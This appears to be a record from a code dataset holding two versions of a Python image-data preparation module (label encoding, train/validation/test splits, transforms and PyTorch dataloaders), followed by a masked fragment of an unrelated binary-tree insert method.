data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
if not self.obj or not self.multi_label:
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
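        # Assemble the transform pipelines (five-crop TTA variants when
        # tta=True), re-estimate mean/std on a stats_percentage sample of the
        # training set, and return datasets, dataloaders and sizes per split.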
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
        resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
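        # Undo the channel-wise normalization (x * std + mean) and clip to
        # [0, 1] so matplotlib can display the image.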
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
        self.get_data(s=size, bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| from dai_imports import*
from obj_utils import*
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_ = None, obj = False,
minorities = None, diffs = None, bal_tfms = None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
# print(self.tfms)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s,tuple):
s = s[0]
row_scale = s/img.size[0]
col_scale = s/img.size[1]
y = rescale_bbox(y,row_scale,col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = (y,y2)
return (x,y)
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform,
target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self,index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self.transform )
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a,b in dt:
x.append(a)
y.append(b)
return x,y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df,thresh=0.8):
c = df.iloc[:,1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [1-(x/max_count) for x in lc]
diffs = dict((k,v) for k,v in zip(c.keys(),diffs))
minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]
return minorities,diffs
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name,name)
new_path = img_dest/new_name
# print(new_path)
os.rename(i,new_path)
tr_images.append(new_name)
tr_labels.append(label)
# os.rmdir(l)
tr_img_label = {'Img':tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a,e):
a = [x+e for x in a]
return a
def one_hot(targets, multi = False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot,binerizer.classes_
def get_index(arr,a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb,row_scale,col_scale):
bb = bb.reshape((-1,4))
for b in bb:
r1,c1,r2,c2 = b
b[0] = int(np.round(r1*col_scale))
b[1] = int(np.round(c1*row_scale))
b[2] = int(np.round(r2*col_scale))
b[3] = int(np.round(c2*row_scale))
# bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])
# for b in bb:
# r1,c1,r2,c2 = b
# b[0] = int(np.round(r1*row_scale))
# b[1] = int(np.round(c1*col_scale))
# b[2] = int(np.round(r2*row_scale))
# b[3] = int(np.round(c2*col_scale))
# if(sum(b)) == 1:
# b[0],b[1],b[2],b[3] = 0,0,0,0
bb = bb.reshape((1,-1))
return bb
def get_img_stats(dataset,sz):
size = int(len(dataset)*sz)
i = 0
imgs = []
for img,_ in dataset:
# print(img.size())
if i > size:
break
imgs.append(img)
i+=1
imgs_ = torch.stack(imgs,dim=3)
imgs_ = imgs_.view(3,-1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean,imgs_std
def split_df(train_df,test_size = 0.15):
try:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])
except:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)
train_df = train_df.reset_index(drop = True)
val_df = val_df.reset_index(drop = True)
return train_df,val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,
tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,
val_csv,reg,tr_name,val_name,test_name,extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self,split_size = 0.15):
data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)
# check if paths given and also set paths
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path,tr_name)
val_path = os.path.join(data_path,val_name)
test_path = os.path.join(data_path,test_name)
if os.path.exists(os.path.join(data_path,tr_name+'.csv')):
train_csv = tr_name+'.csv'
# if os.path.exists(os.path.join(data_path,val_name+'.csv')):
# val_csv = val_name+'.csv'
# if os.path.exists(os.path.join(data_path,test_name+'.csv')):
# test_csv = test_name+'.csv'
# paths to csv
if not train_csv:
print('no')
train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)
train_csv_path = os.path.join(data_path,train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:,0])]
if self.extension:
img_names = add_extension(img_names,self.extension)
if val_csv:
val_csv_path = os.path.join(data_path,val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str,list(val_df.iloc[:,1])))
if test_csv:
test_csv_path = os.path.join(data_path,test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str,list(test_df.iloc[:,1])))
targets = list(map(str,list(train_df.iloc[:,1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
# bounding boxes
int_targets = [list(map(float,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
# one-hot classes
obj_targets = list(map(str,list(train_df.iloc[:,2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int,x)) for x in obj_split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(obj_split_targets,True)
# train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
# class indexes
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]
zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)
# print(zero_idx.shape)
for i,t in enumerate(zero_idx):
# temp_l = len(class_idx[i])
# if temp_l > 90:
# print(i,temp_l)
t[len(t)-len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
# self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int,x)) for x in split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)
train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:,1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:,1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:,1] = target_ids
self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets
# self.models_path = os.path.join(self.data_dir, 'models')
# os.makedirs(self.models_path,exist_ok=True)
if not val_csv:
train_df,val_df = split_df(train_df,split_size)
if not test_csv:
val_df,test_df = split_df(val_df,split_size)
tr_images = [str(x) for x in list(train_df.iloc[:,0])]
val_images = [str(x) for x in list(val_df.iloc[:,0])]
test_images = [str(x) for x in list(test_df.iloc[:,0])]
if self.extension:
tr_images = add_extension(tr_images,self.extension)
val_images = add_extension(val_images,self.extension)
test_images = add_extension(test_images,self.extension)
train_df.iloc[:,0] = tr_images
val_df.iloc[:,0] = val_images
test_df.iloc[:,0] = test_images
train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)
val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)
test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)
self.minorities,self.class_diffs = None,None
if (not self.obj) or (not self.multi_label):
self.minorities,self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}
data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,
'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}
# save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):
train_df = csv_from_path(tr_path,tr_path)
train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',None)
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path,tr_path)
val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv')
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path,tr_path)
test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv')
return ret
def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,
bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],
data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.val_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.test_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
])}
# tta_tfms = {self.tr_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]),
# self.val_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]) }
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None,
self.test_name: None
}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
# resize_transform = transforms.RandomResizedCrop(s[0])
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
else:
tfms_temp = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {
self.tr_name: tfms,
self.val_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
],
self.test_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)
self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)
data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std
data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std
data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])
for x in [self.tr_name, self.val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj)
for x in [self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,
shuffle=True, num_workers=num_workers)
for x in [self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}
self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,
dataset_sizes)
return image_datasets,dataloaders,dataset_sizes
def imshow(self,inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self,inp,calculate = False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self,folder_name = 'train', size = (64,64), bs = 5):
        self.get_data(s=size,bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0],batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
# def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):
# # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'
# # .format(anc_grids,anc_zooms,anc_ratios))
# # print('If so, you may call the function "set_up_object_detection" with your own paramteres.')
# cmap = get_cmap(num_colr)
# self.colr_list = [cmap(float(x)) for x in range(num_colr)]
# self.num_colr = num_colr
# self.create_anchors(anc_grids,anc_zooms,anc_ratios)
# self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)
# self.loss_f = FocalLoss(self.num_classes)
# def create_anchors(self,anc_grids,anc_zooms,anc_ratios):
# anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]
# k = len(anchor_scales)
# anc_offsets = [1/(o*2) for o in anc_grids]
# anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)
# anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])
# grid_sizes = torch.tensor(np.concatenate([np.array(
# [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])).float().unsqueeze(1).to(self.device)
# anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)
# anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])
# self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
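# A minimal usage sketch of the DataProcessor pipeline above. The 'data/'
# path and the train/<class>/*.jpg layout are assumptions; the calls are the
# API defined above.
if __name__ == '__main__':
    dp = DataProcessor(data_path='data/')  # builds train/val/test CSVs from the folders
    image_datasets, dataloaders, dataset_sizes = dp.get_data(s=(224, 224), bs=32)
    dp.show_data(folder_name='train', size=(224, 224), bs=5)  # preview one batch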
| [
16,
18,
25,
28,
29
] |
81 | 64c32b3ada7fff51a7c4b07872b7688e100897d8 | <mask token>
class tree(object):
<mask token>
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
